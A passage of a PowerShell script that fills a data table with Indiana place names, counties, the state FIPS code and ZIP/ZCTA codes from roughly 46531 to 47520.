$Cities.Rows.Add("Grovertown","Starke","Indiana","IN","18","46531") + $null = $Cities.Rows.Add("Hamlet","Starke","Indiana","IN","18","46532") + $null = $Cities.Rows.Add("Ober","Starke","Indiana","IN","18","46534") + $null = $Cities.Rows.Add("Lakeville","St. Joseph","Indiana","IN","18","46536") + $null = $Cities.Rows.Add("Lapaz","Marshall","Indiana","IN","18","46537") + $null = $Cities.Rows.Add("Leesburg","Kosciusko","Indiana","IN","18","46538") + $null = $Cities.Rows.Add("Mentone","Kosciusko","Indiana","IN","18","46539") + $null = $Cities.Rows.Add("Middlebury","Elkhart","Indiana","IN","18","46540") + $null = $Cities.Rows.Add("Milford","Kosciusko","Indiana","IN","18","46542") + $null = $Cities.Rows.Add("Millersburg","Elkhart","Indiana","IN","18","46543") + $null = $Cities.Rows.Add("Mishawaka","St. Joseph","Indiana","IN","18","46544") + $null = $Cities.Rows.Add("Mishawaka","St. Joseph","Indiana","IN","18","46545") + $null = $Cities.Rows.Add("Nappanee","Elkhart","Indiana","IN","18","46550") + $null = $Cities.Rows.Add("New carlisle","St. Joseph","Indiana","IN","18","46552") + $null = $Cities.Rows.Add("New paris","Elkhart","Indiana","IN","18","46553") + $null = $Cities.Rows.Add("North liberty","St. Joseph","Indiana","IN","18","46554") + $null = $Cities.Rows.Add("North webster","Kosciusko","Indiana","IN","18","46555") + $null = $Cities.Rows.Add("Saint marys","St. Joseph","Indiana","IN","18","46556") + $null = $Cities.Rows.Add("Osceola","St. Joseph","Indiana","IN","18","46561") + $null = $Cities.Rows.Add("Pierceton","Kosciusko","Indiana","IN","18","46562") + $null = $Cities.Rows.Add("Inwood","Marshall","Indiana","IN","18","46563") + $null = $Cities.Rows.Add("Shipshewana","Lagrange","Indiana","IN","18","46565") + $null = $Cities.Rows.Add("Sidney","Kosciusko","Indiana","IN","18","46566") + $null = $Cities.Rows.Add("Syracuse","Kosciusko","Indiana","IN","18","46567") + $null = $Cities.Rows.Add("Tippecanoe","Marshall","Indiana","IN","18","46570") + $null = $Cities.Rows.Add("Topeka","Lagrange","Indiana","IN","18","46571") + $null = $Cities.Rows.Add("Wakarusa","Elkhart","Indiana","IN","18","46573") + $null = $Cities.Rows.Add("Walkerton","St. Joseph","Indiana","IN","18","46574") + $null = $Cities.Rows.Add("Warsaw","Kosciusko","Indiana","IN","18","46580") + $null = $Cities.Rows.Add("Zcta 46582","Kosciusko","Indiana","IN","18","46582") + $null = $Cities.Rows.Add("Winona lake","Kosciusko","Indiana","IN","18","46590") + $null = $Cities.Rows.Add("Wyatt","St. Joseph","Indiana","IN","18","46595") + $null = $Cities.Rows.Add("Zcta 465hh","Elkhart","Indiana","IN","18","465HH") + $null = $Cities.Rows.Add("South bend","St. Joseph","Indiana","IN","18","46601") + $null = $Cities.Rows.Add("South bend","St. Joseph","Indiana","IN","18","46613") + $null = $Cities.Rows.Add("South bend","St. Joseph","Indiana","IN","18","46614") + $null = $Cities.Rows.Add("South bend","St. Joseph","Indiana","IN","18","46615") + $null = $Cities.Rows.Add("South bend","St. Joseph","Indiana","IN","18","46616") + $null = $Cities.Rows.Add("South bend","St. Joseph","Indiana","IN","18","46617") + $null = $Cities.Rows.Add("South bend","St. Joseph","Indiana","IN","18","46619") + $null = $Cities.Rows.Add("South bend","St. Joseph","Indiana","IN","18","46628") + $null = $Cities.Rows.Add("South bend","St. Joseph","Indiana","IN","18","46629") + $null = $Cities.Rows.Add("South bend","St. Joseph","Indiana","IN","18","46635") + $null = $Cities.Rows.Add("South bend","St. Joseph","Indiana","IN","18","46637") + $null = $Cities.Rows.Add("Zcta 466hh","St. Joseph","Indiana","IN","18","466HH") + $null = $Cities.Rows.Add("Albion","Noble","Indiana","IN","18","46701") + $null = $Cities.Rows.Add("Andrews","Huntington","Indiana","IN","18","46702") + $null = $Cities.Rows.Add("Angola","Steuben","Indiana","IN","18","46703") + $null = $Cities.Rows.Add("Ashley","De Kalb","Indiana","IN","18","46705") + $null = $Cities.Rows.Add("Auburn","De Kalb","Indiana","IN","18","46706") + $null = $Cities.Rows.Add("Avilla","Noble","Indiana","IN","18","46710") + $null = $Cities.Rows.Add("Linn grove","Adams","Indiana","IN","18","46711") + $null = $Cities.Rows.Add("Bluffton","Wells","Indiana","IN","18","46714") + $null = $Cities.Rows.Add("Butler","De Kalb","Indiana","IN","18","46721") + $null = $Cities.Rows.Add("Churubusco","Whitley","Indiana","IN","18","46723") + $null = $Cities.Rows.Add("Columbia city","Whitley","Indiana","IN","18","46725") + $null = $Cities.Rows.Add("Corunna","De Kalb","Indiana","IN","18","46730") + $null = $Cities.Rows.Add("Craigville","Wells","Indiana","IN","18","46731") + $null = $Cities.Rows.Add("Cromwell","Noble","Indiana","IN","18","46732") + $null = $Cities.Rows.Add("Decatur","Adams","Indiana","IN","18","46733") + $null = $Cities.Rows.Add("Fremont","Steuben","Indiana","IN","18","46737") + $null = $Cities.Rows.Add("Garrett","De Kalb","Indiana","IN","18","46738") + $null = $Cities.Rows.Add("Geneva","Adams","Indiana","IN","18","46740") + $null = $Cities.Rows.Add("Grabill","Allen","Indiana","IN","18","46741") + $null = $Cities.Rows.Add("Hamilton","Steuben","Indiana","IN","18","46742") + $null = $Cities.Rows.Add("Harlan","Allen","Indiana","IN","18","46743") + $null = $Cities.Rows.Add("Hoagland","Allen","Indiana","IN","18","46745") + $null = $Cities.Rows.Add("Howe","Lagrange","Indiana","IN","18","46746") + $null = $Cities.Rows.Add("Helmer","Steuben","Indiana","IN","18","46747") + $null = $Cities.Rows.Add("Huntertown","Allen","Indiana","IN","18","46748") + $null = $Cities.Rows.Add("Huntington","Huntington","Indiana","IN","18","46750") + $null = $Cities.Rows.Add("Kendallville","Noble","Indiana","IN","18","46755") + $null = $Cities.Rows.Add("Keystone","Wells","Indiana","IN","18","46759") + $null = $Cities.Rows.Add("Kimmell","Noble","Indiana","IN","18","46760") + $null = $Cities.Rows.Add("Lagrange","Lagrange","Indiana","IN","18","46761") + $null = $Cities.Rows.Add("Laotto","Noble","Indiana","IN","18","46763") + $null = $Cities.Rows.Add("Larwill","Whitley","Indiana","IN","18","46764") + $null = $Cities.Rows.Add("Leo","Allen","Indiana","IN","18","46765") + $null = $Cities.Rows.Add("Liberty center","Wells","Indiana","IN","18","46766") + $null = $Cities.Rows.Add("Ligonier","Noble","Indiana","IN","18","46767") + $null = $Cities.Rows.Add("Markle","Wells","Indiana","IN","18","46770") + $null = $Cities.Rows.Add("Monroe","Adams","Indiana","IN","18","46772") + $null = $Cities.Rows.Add("Monroeville","Allen","Indiana","IN","18","46773") + $null = $Cities.Rows.Add("New haven","Allen","Indiana","IN","18","46774") + $null = $Cities.Rows.Add("Orland","Steuben","Indiana","IN","18","46776") + $null = $Cities.Rows.Add("Ossian","Wells","Indiana","IN","18","46777") + $null = $Cities.Rows.Add("Pleasant lake","Steuben","Indiana","IN","18","46779") + $null = $Cities.Rows.Add("Poneto","Wells","Indiana","IN","18","46781") + $null = $Cities.Rows.Add("Roanoke","Huntington","Indiana","IN","18","46783") + $null = $Cities.Rows.Add("Rome city","Noble","Indiana","IN","18","46784") + $null = $Cities.Rows.Add("Saint joe","De Kalb","Indiana","IN","18","46785") + $null = $Cities.Rows.Add("South whitley","Whitley","Indiana","IN","18","46787") + $null = $Cities.Rows.Add("Spencerville","Allen","Indiana","IN","18","46788") + $null = $Cities.Rows.Add("Uniondale","Wells","Indiana","IN","18","46791") + $null = $Cities.Rows.Add("Warren","Huntington","Indiana","IN","18","46792") + $null = $Cities.Rows.Add("Waterloo","De Kalb","Indiana","IN","18","46793") + $null = $Cities.Rows.Add("Wawaka","Noble","Indiana","IN","18","46794") + $null = $Cities.Rows.Add("Wolcottville","Lagrange","Indiana","IN","18","46795") + $null = $Cities.Rows.Add("Woodburn","Allen","Indiana","IN","18","46797") + $null = $Cities.Rows.Add("Yoder","Allen","Indiana","IN","18","46798") + $null = $Cities.Rows.Add("Zanesville","Wells","Indiana","IN","18","46799") + $null = $Cities.Rows.Add("Zcta 467hh","Allen","Indiana","IN","18","467HH") + $null = $Cities.Rows.Add("Fort wayne","Allen","Indiana","IN","18","46802") + $null = $Cities.Rows.Add("Fort wayne","Allen","Indiana","IN","18","46803") + $null = $Cities.Rows.Add("Fort wayne","Allen","Indiana","IN","18","46804") + $null = $Cities.Rows.Add("Fort wayne","Allen","Indiana","IN","18","46805") + $null = $Cities.Rows.Add("Fort wayne","Allen","Indiana","IN","18","46806") + $null = $Cities.Rows.Add("Fort wayne","Allen","Indiana","IN","18","46807") + $null = $Cities.Rows.Add("Fort wayne","Allen","Indiana","IN","18","46808") + $null = $Cities.Rows.Add("Fort wayne","Allen","Indiana","IN","18","46809") + $null = $Cities.Rows.Add("Fort wayne","Allen","Indiana","IN","18","46814") + $null = $Cities.Rows.Add("Fort wayne","Allen","Indiana","IN","18","46815") + $null = $Cities.Rows.Add("Fort wayne","Allen","Indiana","IN","18","46816") + $null = $Cities.Rows.Add("Fort wayne","Allen","Indiana","IN","18","46818") + $null = $Cities.Rows.Add("Fort wayne","Allen","Indiana","IN","18","46819") + $null = $Cities.Rows.Add("Fort wayne","Allen","Indiana","IN","18","46825") + $null = $Cities.Rows.Add("Fort wayne","Allen","Indiana","IN","18","46835") + $null = $Cities.Rows.Add("Fort wayne","Allen","Indiana","IN","18","46845") + $null = $Cities.Rows.Add("Kokomo","Howard","Indiana","IN","18","46901") + $null = $Cities.Rows.Add("Kokomo","Howard","Indiana","IN","18","46902") + $null = $Cities.Rows.Add("Akron","Fulton","Indiana","IN","18","46910") + $null = $Cities.Rows.Add("Amboy","Miami","Indiana","IN","18","46911") + $null = $Cities.Rows.Add("Bringhurst","Carroll","Indiana","IN","18","46913") + $null = $Cities.Rows.Add("Bunker hill","Miami","Indiana","IN","18","46914") + $null = $Cities.Rows.Add("Camden","Carroll","Indiana","IN","18","46917") + $null = $Cities.Rows.Add("Converse","Miami","Indiana","IN","18","46919") + $null = $Cities.Rows.Add("Cutler","Carroll","Indiana","IN","18","46920") + $null = $Cities.Rows.Add("Deedsville","Miami","Indiana","IN","18","46921") + $null = $Cities.Rows.Add("Delphi","Carroll","Indiana","IN","18","46923") + $null = $Cities.Rows.Add("Chili","Miami","Indiana","IN","18","46926") + $null = $Cities.Rows.Add("Fairmount","Grant","Indiana","IN","18","46928") + $null = $Cities.Rows.Add("Flora","Carroll","Indiana","IN","18","46929") + $null = $Cities.Rows.Add("Fowlerton","Grant","Indiana","IN","18","46930") + $null = $Cities.Rows.Add("Fulton","Fulton","Indiana","IN","18","46931") + $null = $Cities.Rows.Add("Galveston","Cass","Indiana","IN","18","46932") + $null = $Cities.Rows.Add("Gas city","Grant","Indiana","IN","18","46933") + $null = $Cities.Rows.Add("Greentown","Howard","Indiana","IN","18","46936") + $null = $Cities.Rows.Add("Jonesboro","Grant","Indiana","IN","18","46938") + $null = $Cities.Rows.Add("Kewanna","Fulton","Indiana","IN","18","46939") + $null = $Cities.Rows.Add("La fontaine","Wabash","Indiana","IN","18","46940") + $null = $Cities.Rows.Add("Lagro","Wabash","Indiana","IN","18","46941") + $null = $Cities.Rows.Add("Laketon","Wabash","Indiana","IN","18","46943") + $null = $Cities.Rows.Add("Liberty mills","Wabash","Indiana","IN","18","46946") + $null = $Cities.Rows.Add("Logansport","Cass","Indiana","IN","18","46947") + $null = $Cities.Rows.Add("Lucerne","Cass","Indiana","IN","18","46950") + $null = $Cities.Rows.Add("Macy","Miami","Indiana","IN","18","46951") + $null = $Cities.Rows.Add("Marion","Grant","Indiana","IN","18","46952") + $null = $Cities.Rows.Add("Marion","Grant","Indiana","IN","18","46953") + $null = $Cities.Rows.Add("Matthews","Grant","Indiana","IN","18","46957") + $null = $Cities.Rows.Add("Mexico","Miami","Indiana","IN","18","46958") + $null = $Cities.Rows.Add("Miami","Miami","Indiana","IN","18","46959") + $null = $Cities.Rows.Add("Monterey","Pulaski","Indiana","IN","18","46960") + $null = $Cities.Rows.Add("New waverly","Cass","Indiana","IN","18","46961") + $null = $Cities.Rows.Add("North manchester","Wabash","Indiana","IN","18","46962") + $null = $Cities.Rows.Add("Ora","Starke","Indiana","IN","18","46968") + $null = $Cities.Rows.Add("Peru","Miami","Indiana","IN","18","46970") + $null = $Cities.Rows.Add("Roann","Wabash","Indiana","IN","18","46974") + $null = $Cities.Rows.Add("Rochester","Fulton","Indiana","IN","18","46975") + $null = $Cities.Rows.Add("Royal center","Cass","Indiana","IN","18","46978") + $null = $Cities.Rows.Add("Russiaville","Howard","Indiana","IN","18","46979") + $null = $Cities.Rows.Add("Silver lake","Kosciusko","Indiana","IN","18","46982") + $null = $Cities.Rows.Add("Star city","Pulaski","Indiana","IN","18","46985") + $null = $Cities.Rows.Add("Swayzee","Grant","Indiana","IN","18","46986") + $null = $Cities.Rows.Add("Sweetser","Grant","Indiana","IN","18","46987") + $null = $Cities.Rows.Add("Twelve mile","Cass","Indiana","IN","18","46988") + $null = $Cities.Rows.Add("Upland","Grant","Indiana","IN","18","46989") + $null = $Cities.Rows.Add("Urbana","Wabash","Indiana","IN","18","46990") + $null = $Cities.Rows.Add("Landess","Grant","Indiana","IN","18","46991") + $null = $Cities.Rows.Add("Wabash","Wabash","Indiana","IN","18","46992") + $null = $Cities.Rows.Add("Walton","Cass","Indiana","IN","18","46994") + $null = $Cities.Rows.Add("Winamac","Pulaski","Indiana","IN","18","46996") + $null = $Cities.Rows.Add("Young america","Cass","Indiana","IN","18","46998") + $null = $Cities.Rows.Add("Zcta 469hh","Carroll","Indiana","IN","18","469HH") + $null = $Cities.Rows.Add("Aurora","Dearborn","Indiana","IN","18","47001") + $null = $Cities.Rows.Add("Zcta 47003","Union","Indiana","IN","18","47003") + $null = $Cities.Rows.Add("Batesville","Ripley","Indiana","IN","18","47006") + $null = $Cities.Rows.Add("Bath","Franklin","Indiana","IN","18","47010") + $null = $Cities.Rows.Add("Bennington","Switzerland","Indiana","IN","18","47011") + $null = $Cities.Rows.Add("Brookville","Franklin","Indiana","IN","18","47012") + $null = $Cities.Rows.Add("Cedar grove","Franklin","Indiana","IN","18","47016") + $null = $Cities.Rows.Add("Cross plains","Ripley","Indiana","IN","18","47017") + $null = $Cities.Rows.Add("Dillsboro","Dearborn","Indiana","IN","18","47018") + $null = $Cities.Rows.Add("East enterprise","Switzerland","Indiana","IN","18","47019") + $null = $Cities.Rows.Add("Florence","Switzerland","Indiana","IN","18","47020") + $null = $Cities.Rows.Add("Friendship","Ripley","Indiana","IN","18","47021") + $null = $Cities.Rows.Add("Guilford","Dearborn","Indiana","IN","18","47022") + $null = $Cities.Rows.Add("Holton","Ripley","Indiana","IN","18","47023") + $null = $Cities.Rows.Add("Laurel","Franklin","Indiana","IN","18","47024") + $null = $Cities.Rows.Add("Lawrenceburg","Dearborn","Indiana","IN","18","47025") + $null = $Cities.Rows.Add("Metamora","Franklin","Indiana","IN","18","47030") + $null = $Cities.Rows.Add("Milan","Ripley","Indiana","IN","18","47031") + $null = $Cities.Rows.Add("Moores hill","Dearborn","Indiana","IN","18","47032") + $null = $Cities.Rows.Add("Napoleon","Ripley","Indiana","IN","18","47034") + $null = $Cities.Rows.Add("New trenton","Franklin","Indiana","IN","18","47035") + $null = $Cities.Rows.Add("Oldenburg","Franklin","Indiana","IN","18","47036") + $null = $Cities.Rows.Add("Osgood","Ripley","Indiana","IN","18","47037") + $null = $Cities.Rows.Add("Patriot","Switzerland","Indiana","IN","18","47038") + $null = $Cities.Rows.Add("Rising sun","Ohio","Indiana","IN","18","47040") + $null = $Cities.Rows.Add("Sunman","Ripley","Indiana","IN","18","47041") + $null = $Cities.Rows.Add("Versailles","Ripley","Indiana","IN","18","47042") + $null = $Cities.Rows.Add("Vevay","Switzerland","Indiana","IN","18","47043") + $null = $Cities.Rows.Add("W harrison","Dearborn","Indiana","IN","18","47060") + $null = $Cities.Rows.Add("Zcta 470hh","Dearborn","Indiana","IN","18","470HH") + $null = $Cities.Rows.Add("Austin","Scott","Indiana","IN","18","47102") + $null = $Cities.Rows.Add("Borden","Clark","Indiana","IN","18","47106") + $null = $Cities.Rows.Add("Campbellsburg","Washington","Indiana","IN","18","47108") + $null = $Cities.Rows.Add("Charlestown","Clark","Indiana","IN","18","47111") + $null = $Cities.Rows.Add("Corydon","Harrison","Indiana","IN","18","47112") + $null = $Cities.Rows.Add("Crandall","Harrison","Indiana","IN","18","47114") + $null = $Cities.Rows.Add("Depauw","Harrison","Indiana","IN","18","47115") + $null = $Cities.Rows.Add("Eckerty","Crawford","Indiana","IN","18","47116") + $null = $Cities.Rows.Add("Elizabeth","Harrison","Indiana","IN","18","47117") + $null = $Cities.Rows.Add("English","Crawford","Indiana","IN","18","47118") + $null = $Cities.Rows.Add("Floyds knobs","Floyd","Indiana","IN","18","47119") + $null = $Cities.Rows.Add("Fredericksburg","Washington","Indiana","IN","18","47120") + $null = $Cities.Rows.Add("Georgetown","Floyd","Indiana","IN","18","47122") + $null = $Cities.Rows.Add("Grantsburg","Crawford","Indiana","IN","18","47123") + $null = $Cities.Rows.Add("Greenville","Floyd","Indiana","IN","18","47124") + $null = $Cities.Rows.Add("Hardinsburg","Washington","Indiana","IN","18","47125") + $null = $Cities.Rows.Add("Henryville","Clark","Indiana","IN","18","47126") + $null = $Cities.Rows.Add("Clarksville","Clark","Indiana","IN","18","47129") + $null = $Cities.Rows.Add("Jeffersonville","Clark","Indiana","IN","18","47130") + $null = $Cities.Rows.Add("Laconia","Harrison","Indiana","IN","18","47135") + $null = $Cities.Rows.Add("Lanesville","Harrison","Indiana","IN","18","47136") + $null = $Cities.Rows.Add("Leavenworth","Crawford","Indiana","IN","18","47137") + $null = $Cities.Rows.Add("Lexington","Scott","Indiana","IN","18","47138") + $null = $Cities.Rows.Add("Little york","Washington","Indiana","IN","18","47139") + $null = $Cities.Rows.Add("Marengo","Crawford","Indiana","IN","18","47140") + $null = $Cities.Rows.Add("Marysville","Clark","Indiana","IN","18","47141") + $null = $Cities.Rows.Add("Mauckport","Harrison","Indiana","IN","18","47142") + $null = $Cities.Rows.Add("Memphis","Clark","Indiana","IN","18","47143") + $null = $Cities.Rows.Add("Milltown","Crawford","Indiana","IN","18","47145") + $null = $Cities.Rows.Add("Nabb","Clark","Indiana","IN","18","47147") + $null = $Cities.Rows.Add("New albany","Floyd","Indiana","IN","18","47150") + $null = $Cities.Rows.Add("New middletown","Harrison","Indiana","IN","18","47160") + $null = $Cities.Rows.Add("New salisbury","Harrison","Indiana","IN","18","47161") + $null = $Cities.Rows.Add("New washington","Clark","Indiana","IN","18","47162") + $null = $Cities.Rows.Add("Otisco","Clark","Indiana","IN","18","47163") + $null = $Cities.Rows.Add("Palmyra","Harrison","Indiana","IN","18","47164") + $null = $Cities.Rows.Add("Pekin","Washington","Indiana","IN","18","47165") + $null = $Cities.Rows.Add("Ramsey","Harrison","Indiana","IN","18","47166") + $null = $Cities.Rows.Add("Salem","Washington","Indiana","IN","18","47167") + $null = $Cities.Rows.Add("Scottsburg","Scott","Indiana","IN","18","47170") + $null = $Cities.Rows.Add("Speed","Clark","Indiana","IN","18","47172") + $null = $Cities.Rows.Add("Sulphur","Crawford","Indiana","IN","18","47174") + $null = $Cities.Rows.Add("Taswell","Crawford","Indiana","IN","18","47175") + $null = $Cities.Rows.Add("Underwood","Clark","Indiana","IN","18","47177") + $null = $Cities.Rows.Add("Zcta 471hh","Clark","Indiana","IN","18","471HH") + $null = $Cities.Rows.Add("Columbus","Bartholomew","Indiana","IN","18","47201") + $null = $Cities.Rows.Add("Columbus","Bartholomew","Indiana","IN","18","47203") + $null = $Cities.Rows.Add("Brownstown","Jackson","Indiana","IN","18","47220") + $null = $Cities.Rows.Add("Butlerville","Jennings","Indiana","IN","18","47223") + $null = $Cities.Rows.Add("Canaan","Switzerland","Indiana","IN","18","47224") + $null = $Cities.Rows.Add("Clifford","Bartholomew","Indiana","IN","18","47226") + $null = $Cities.Rows.Add("Commiskey","Jennings","Indiana","IN","18","47227") + $null = $Cities.Rows.Add("Crothersville","Jackson","Indiana","IN","18","47229") + $null = $Cities.Rows.Add("Deputy","Jefferson","Indiana","IN","18","47230") + $null = $Cities.Rows.Add("Dupont","Jefferson","Indiana","IN","18","47231") + $null = $Cities.Rows.Add("Elizabethtown","Bartholomew","Indiana","IN","18","47232") + $null = $Cities.Rows.Add("Flat rock","Shelby","Indiana","IN","18","47234") + $null = $Cities.Rows.Add("Freetown","Jackson","Indiana","IN","18","47235") + $null = $Cities.Rows.Add("Adams","Decatur","Indiana","IN","18","47240") + $null = $Cities.Rows.Add("Hanover","Jefferson","Indiana","IN","18","47243") + $null = $Cities.Rows.Add("Hartsville","Bartholomew","Indiana","IN","18","47244") + $null = $Cities.Rows.Add("Hope","Bartholomew","Indiana","IN","18","47246") + $null = $Cities.Rows.Add("Jonesville","Bartholomew","Indiana","IN","18","47247") + $null = $Cities.Rows.Add("Madison","Jefferson","Indiana","IN","18","47250") + $null = $Cities.Rows.Add("Medora","Jackson","Indiana","IN","18","47260") + $null = $Cities.Rows.Add("New point","Decatur","Indiana","IN","18","47263") + $null = $Cities.Rows.Add("Norman","Jackson","Indiana","IN","18","47264") + $null = $Cities.Rows.Add("North vernon","Jennings","Indiana","IN","18","47265") + $null = $Cities.Rows.Add("Paris crossing","Jennings","Indiana","IN","18","47270") + $null = $Cities.Rows.Add("Saint paul","Decatur","Indiana","IN","18","47272") + $null = $Cities.Rows.Add("Scipio","Jennings","Indiana","IN","18","47273") + $null = $Cities.Rows.Add("Seymour","Jackson","Indiana","IN","18","47274") + $null = $Cities.Rows.Add("Taylorsville","Bartholomew","Indiana","IN","18","47280") + $null = $Cities.Rows.Add("Vallonia","Jackson","Indiana","IN","18","47281") + $null = $Cities.Rows.Add("Vernon","Jennings","Indiana","IN","18","47282") + $null = $Cities.Rows.Add("Westport","Decatur","Indiana","IN","18","47283") + $null = $Cities.Rows.Add("Zcta 472hh","Bartholomew","Indiana","IN","18","472HH") + $null = $Cities.Rows.Add("Muncie","Delaware","Indiana","IN","18","47302") + $null = $Cities.Rows.Add("Muncie","Delaware","Indiana","IN","18","47303") + $null = $Cities.Rows.Add("Muncie","Delaware","Indiana","IN","18","47304") + $null = $Cities.Rows.Add("Muncie","Delaware","Indiana","IN","18","47305") + $null = $Cities.Rows.Add("Albany","Delaware","Indiana","IN","18","47320") + $null = $Cities.Rows.Add("Brownsville","Union","Indiana","IN","18","47325") + $null = $Cities.Rows.Add("Bryant","Jay","Indiana","IN","18","47326") + $null = $Cities.Rows.Add("Cambridge city","Wayne","Indiana","IN","18","47327") + $null = $Cities.Rows.Add("Centerville","Wayne","Indiana","IN","18","47330") + $null = $Cities.Rows.Add("Connersville","Fayette","Indiana","IN","18","47331") + $null = $Cities.Rows.Add("Daleville","Delaware","Indiana","IN","18","47334") + $null = $Cities.Rows.Add("Dunkirk","Jay","Indiana","IN","18","47336") + $null = $Cities.Rows.Add("Dunreith","Henry","Indiana","IN","18","47337") + $null = $Cities.Rows.Add("Eaton","Delaware","Indiana","IN","18","47338") + $null = $Cities.Rows.Add("Economy","Wayne","Indiana","IN","18","47339") + $null = $Cities.Rows.Add("Farmland","Randolph","Indiana","IN","18","47340") + $null = $Cities.Rows.Add("Fountain city","Wayne","Indiana","IN","18","47341") + $null = $Cities.Rows.Add("Gaston","Delaware","Indiana","IN","18","47342") + $null = $Cities.Rows.Add("Greensboro","Henry","Indiana","IN","18","47344") + $null = $Cities.Rows.Add("Greens fork","Wayne","Indiana","IN","18","47345") + $null = $Cities.Rows.Add("Hagerstown","Wayne","Indiana","IN","18","47346") + $null = $Cities.Rows.Add("Hartford city","Blackford","Indiana","IN","18","47348") + $null = $Cities.Rows.Add("Kennard","Henry","Indiana","IN","18","47351") + $null = $Cities.Rows.Add("Lewisville","Henry","Indiana","IN","18","47352") + $null = $Cities.Rows.Add("Liberty","Union","Indiana","IN","18","47353") + $null = $Cities.Rows.Add("Losantville","Randolph","Indiana","IN","18","47354") + $null = $Cities.Rows.Add("Lynn","Randolph","Indiana","IN","18","47355") + $null = $Cities.Rows.Add("Middletown","Henry","Indiana","IN","18","47356") + $null = $Cities.Rows.Add("Milton","Wayne","Indiana","IN","18","47357") + $null = $Cities.Rows.Add("Modoc","Randolph","Indiana","IN","18","47358") + $null = $Cities.Rows.Add("Montpelier","Blackford","Indiana","IN","18","47359") + $null = $Cities.Rows.Add("Mooreland","Henry","Indiana","IN","18","47360") + $null = $Cities.Rows.Add("Mount summit","Henry","Indiana","IN","18","47361") + $null = $Cities.Rows.Add("New castle","Henry","Indiana","IN","18","47362") + $null = $Cities.Rows.Add("Parker city","Randolph","Indiana","IN","18","47368") + $null = $Cities.Rows.Add("Pennville","Jay","Indiana","IN","18","47369") + $null = $Cities.Rows.Add("Portland","Jay","Indiana","IN","18","47371") + $null = $Cities.Rows.Add("Redkey","Jay","Indiana","IN","18","47373") + $null = $Cities.Rows.Add("Richmond","Wayne","Indiana","IN","18","47374") + $null = $Cities.Rows.Add("Ridgeville","Randolph","Indiana","IN","18","47380") + $null = $Cities.Rows.Add("Salamonia","Jay","Indiana","IN","18","47381") + $null = $Cities.Rows.Add("Saratoga","Randolph","Indiana","IN","18","47382") + $null = $Cities.Rows.Add("Selma","Delaware","Indiana","IN","18","47383") + $null = $Cities.Rows.Add("Shirley","Henry","Indiana","IN","18","47384") + $null = $Cities.Rows.Add("Spiceland","Henry","Indiana","IN","18","47385") + $null = $Cities.Rows.Add("Springport","Henry","Indiana","IN","18","47386") + $null = $Cities.Rows.Add("Straughn","Henry","Indiana","IN","18","47387") + $null = $Cities.Rows.Add("Union city","Randolph","Indiana","IN","18","47390") + $null = $Cities.Rows.Add("Webster","Wayne","Indiana","IN","18","47392") + $null = $Cities.Rows.Add("Williamsburg","Wayne","Indiana","IN","18","47393") + $null = $Cities.Rows.Add("Winchester","Randolph","Indiana","IN","18","47394") + $null = $Cities.Rows.Add("Yorktown","Delaware","Indiana","IN","18","47396") + $null = $Cities.Rows.Add("Zcta 473hh","Delaware","Indiana","IN","18","473HH") + $null = $Cities.Rows.Add("Bloomington","Monroe","Indiana","IN","18","47401") + $null = $Cities.Rows.Add("Bloomington","Monroe","Indiana","IN","18","47403") + $null = $Cities.Rows.Add("Bloomington","Monroe","Indiana","IN","18","47404") + $null = $Cities.Rows.Add("Bloomington","Monroe","Indiana","IN","18","47406") + $null = $Cities.Rows.Add("Woodbridge","Monroe","Indiana","IN","18","47408") + $null = $Cities.Rows.Add("Avoca","Lawrence","Indiana","IN","18","47420") + $null = $Cities.Rows.Add("Bedford","Lawrence","Indiana","IN","18","47421") + $null = $Cities.Rows.Add("Bloomfield","Greene","Indiana","IN","18","47424") + $null = $Cities.Rows.Add("Coal city","Owen","Indiana","IN","18","47427") + $null = $Cities.Rows.Add("Ellettsville","Monroe","Indiana","IN","18","47429") + $null = $Cities.Rows.Add("Fort ritner","Lawrence","Indiana","IN","18","47430") + $null = $Cities.Rows.Add("Freedom","Owen","Indiana","IN","18","47431") + $null = $Cities.Rows.Add("French lick","Orange","Indiana","IN","18","47432") + $null = $Cities.Rows.Add("Gosport","Owen","Indiana","IN","18","47433") + $null = $Cities.Rows.Add("Heltonville","Lawrence","Indiana","IN","18","47436") + $null = $Cities.Rows.Add("Jasonville","Greene","Indiana","IN","18","47438") + $null = $Cities.Rows.Add("Linton","Greene","Indiana","IN","18","47441") + $null = $Cities.Rows.Add("Lyons","Greene","Indiana","IN","18","47443") + $null = $Cities.Rows.Add("Midland","Greene","Indiana","IN","18","47445") + $null = $Cities.Rows.Add("Mitchell","Lawrence","Indiana","IN","18","47446") + $null = $Cities.Rows.Add("Nashville","Brown","Indiana","IN","18","47448") + $null = $Cities.Rows.Add("Newberry","Greene","Indiana","IN","18","47449") + $null = $Cities.Rows.Add("Oolitic","Lawrence","Indiana","IN","18","47451") + $null = $Cities.Rows.Add("Orleans","Orange","Indiana","IN","18","47452") + $null = $Cities.Rows.Add("Owensburg","Greene","Indiana","IN","18","47453") + $null = $Cities.Rows.Add("Paoli","Orange","Indiana","IN","18","47454") + $null = $Cities.Rows.Add("Patricksburg","Owen","Indiana","IN","18","47455") + $null = $Cities.Rows.Add("Quincy","Owen","Indiana","IN","18","47456") + $null = $Cities.Rows.Add("Solsberry","Greene","Indiana","IN","18","47459") + $null = $Cities.Rows.Add("Spencer","Owen","Indiana","IN","18","47460") + $null = $Cities.Rows.Add("Springville","Lawrence","Indiana","IN","18","47462") + $null = $Cities.Rows.Add("Stinesville","Monroe","Indiana","IN","18","47464") + $null = $Cities.Rows.Add("Switz city","Greene","Indiana","IN","18","47465") + $null = $Cities.Rows.Add("Tunnelton","Lawrence","Indiana","IN","18","47467") + $null = $Cities.Rows.Add("Unionville","Monroe","Indiana","IN","18","47468") + $null = $Cities.Rows.Add("West baden sprin","Orange","Indiana","IN","18","47469") + $null = $Cities.Rows.Add("Williams","Lawrence","Indiana","IN","18","47470") + $null = $Cities.Rows.Add("Worthington","Greene","Indiana","IN","18","47471") + $null = $Cities.Rows.Add("Zcta 474hh","Brown","Indiana","IN","18","474HH") + $null = $Cities.Rows.Add("Washington","Daviess","Indiana","IN","18","47501") + $null = $Cities.Rows.Add("Bicknell","Knox","Indiana","IN","18","47512") + $null = $Cities.Rows.Add("Birdseye","Dubois","Indiana","IN","18","47513") + $null = $Cities.Rows.Add("Branchville","Perry","Indiana","IN","18","47514") + $null = $Cities.Rows.Add("Siberia","Perry","Indiana","IN","18","47515") + $null = $Cities.Rows.Add("Bruceville","Knox","Indiana","IN","18","47516") + $null = $Cities.Rows.Add("Cannelburg","Daviess","Indiana","IN","18","47519") + $null = $Cities.Rows.Add("Mount pleasant","Perry","Indiana","IN","18","47520") + $null = 